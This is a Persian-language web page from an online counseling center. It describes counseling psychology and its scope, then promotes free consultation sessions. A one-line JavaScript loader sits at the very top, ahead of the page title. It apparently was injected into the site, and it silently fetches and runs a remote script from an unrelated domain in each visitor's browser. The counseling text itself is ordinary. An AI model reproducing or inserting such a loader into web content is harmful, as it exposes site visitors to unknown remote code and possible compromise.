;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); مشاوره روانشناسی چیست؟ | مرکز مشاوره آنلاین روان‌یاری

مشاوره روانشناسی چیست؟

میزان پیشرفت خواندن شما

فهرست مطالب

مشاوره روانشناسی یک تخصص در روانشناسی حرفه ای است که یک تمرکز روی تسهیل عملکرد فردی و غیرفردی را در طول چرخه ی زندگی برقرار می کند. این تخصص به نگرانی های احساسی، اجتماعی، شغلی، تحصیلی، مربوط به سلامت، توسعه و سازمانی توجه ویژه ای دارد.

تمرین مشاوره روانشناسی، شامل طیف گسترده ای از تمرین های حساس به فرهنگ می شود که به مردم کمک می کند تا بهزیستی، آرام کردن پریشان حالی، ناسازگاری و حل بحرانشان را بهبود ببخشند و قابلیت آن ها برای عملکرد بهتر در زندگی شان را افزایش می دهد. با توجه به دقت آن روی جفت مشکلات پیشرفتی عادی و مشکلاتی که با اختلالات فیزیکی، احساسی و ذهنی در ارتباط هستند، این تخصص در حیطه های گسترده تر روانشناسیِ مبتنی بر تمرین، دارای یک دیدگاه منحصر به فرد است.

روانشناسان مشاوره به افرادی از همه ی سنین و همه ی فرهنگ های پیش زمینه در قالب نشست های انفرادی و هم نشست های گروهی خدمت می کنند‌. آن ها همچنین به طور مرتب به سازمان هایی که به دنبال افزایش کارایی شان هستند یا به دنبال زندگی بهتر اعضایشان هستند مشاوره می دهند.

مداخلات مورد استفاده روانشناسان مشاوره ممکن است کوتاه یا طولانی مدت باشد: آنها غالباً مربوط به مسئله و هدفمند هستند. این فعالیت ها توسط فلسفه ای هدایت می شود که به تفاوت ها و تنوعات فردی، تمرکزی روی پیشگیری، توسعه و سازگاری در طول زندگی ارزش قائل است.

Rate this post
  به روانشناس چه بگوییم؟

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.